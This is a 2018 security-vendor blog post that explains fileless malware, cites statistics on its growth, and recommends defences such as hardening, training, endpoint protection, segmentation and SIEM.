By The Integrity360 Team on November 14, 2018

Why Fileless Attacks Should Be On Every Company's Cyber Security Radar

Cyber Risk and Assurance, Breaches, Alerts & Advisories

Even the world’s most unskilled and inexperienced criminals know it’s always better to sneak in the back door of a shop instead of breaking down the one in the front.

Hackers are starting to follow the same logic, and the trend is resulting in an increase of fileless attacks. Armed with the knowledge that the vast majority of businesses have cyber security tools in place to scan and stop malicious files from carrying out their objective, criminals are getting around that obstacle by using alternative methods of delivering and executing a payload.

The emerging methodology is putting businesses on alert and prompting them to pay greater respect to fileless attacks in their cyber security strategies.

What is a fileless attack?

Fileless attacks, also known as fileless malware, are attacks that forego the traditional method of installing an executable file on a user’s computer. Instead, they leverage onboard memory to carry out the campaign, leaving no traceable footprint.

Fileless attacks use infected files, applications and websites, zero-day exploits or Remote Code Execution (RCE) vulnerabilities to deliver malicious macros to the target.

From there, the scripts can be run through a variety of legitimate features hosted on the end user’s personal computer to call and execute a payload, including:

  • PowerShell
  • Process hollowing
  • Remote Desktop Protocol (RDP)
  • Windows Management Instrumentation (WMI)
  • Dynamic Link Library (DLL) injection
  • PsExec

In layman’s terms: Fileless attacks manipulate authentic programs that were created to help users and administrators to launch malicious code.

Why are fileless attacks seeing increased usage rates?

You’d be hard-pressed to find a company that doesn’t have an anti-virus solution in its inventory of cyber security tools. Traditional anti-virus platforms leverage signature-based detection to match characteristics of an attack with known instances of malware.

While they’re successful in doing so, they have difficulties identifying new techniques. These could exploit new types of attachments or, as is the case in many fileless attacks, run malicious scripts through on-board memory or other types of programs.

Threat groups have caught onto this fact, sparking a trend in usage among attackers. Researchers from SentinelOne clocked a 94 percent uptick in the frequency of fileless attacks over the first half of 2018. This accounted for 42 out of every 1,000 endpoint attacks reviewed and outstripped ransomware’s total, which was just 14 out of every 1,000.

Among all security incidents in 2017, 29 percent were fileless attacks, according to a report from the Ponemon Institute. This figure is expected to expand to one-third of all campaigns in 2018, largely because the study found that they’re nearly 10 times more likely to result in a successful attack than their file-based counterparts.

As long as organisations continue to rely on pre-baked threat detection, fileless attacks will remain incredibly difficult to stop. Innovative companies are transforming their cyber security strategies to deal with the resurgence of fileless attacks by introducing user behaviour analytics, which uses artificial intelligence to identify anomalous activity on the network.

How can businesses defend against fileless attacks?

Companies that rely on outdated cyber security strategies will have a difficult road ahead of them. Legacy tools aren’t able to give security specialists the granular visibility into user activity that’s necessary to spot a fileless attack, and instead can inundate them with false alerts.

Furthermore, they lack the ability to maintain pace with the barrage of new delivery options and techniques for execution that are hitting the industry. Once past initial defences, many attacks immediately end anti-virus services before commencing their activity.

Organisations can limit the surface area for fileless attacks through system hardening by disabling services that are commonly leveraged by hackers but may not be used within the company, like PowerShell or the Remote Desktop Protocol (RDP).

Businesses without a cyber security framework in place need to adopt one soon. Many of the controls required to meet compliance with frameworks like the Centre for Internet Security (CIS) Top 20 or the National Institute of Standards and Technology (NIST) can drastically improve a company’s security posture.

Furthermore, employee awareness training is becoming more critical by the day. A rising number of campaigns are using malicious file attachments in the form of Word and Excel – and even new formats, like Microsoft Publisher and Excel IQY files – to spread the payload. Failure to stop them at the point of entry usually leads to an employee enabling macros on the content, and the fileless attack begins running in the background.

These are all fundamental steps in taking back control of digital environments from emerging threats, but they fail to solve the underlying issue: Legacy technology that’s tasked with combating state-of-the-art attacks.

There are three solutions that businesses can take advantage of to defend their users and assets from fileless attacks:

  • Next-generation anti-virus and endpoint protection: Leverage artificial intelligence to overcome the limitations of signature-based detection.
  • Network segmentation: Create subnetworks to mitigate a hacker’s ability to move laterally.
  • Next-generation Security Information and Event Management (SIEM): Gain greater visibility into network movement and cut out false-positive alerts to spot attacks more quickly.

 

Fileless attacks aren’t going out of fashion anytime soon, and retro cyber security tools won’t be able to stop them. Talk with an Integrity360 consultant today to learn how your business can protect itself from hackers’ latest techniques.

Risk Radar Report

Sign up to receive the latest insights

Join our cyber security community to stay up to date with the latest news, insights, threat intel and more right in your inbox.  All you have to do is choose how often.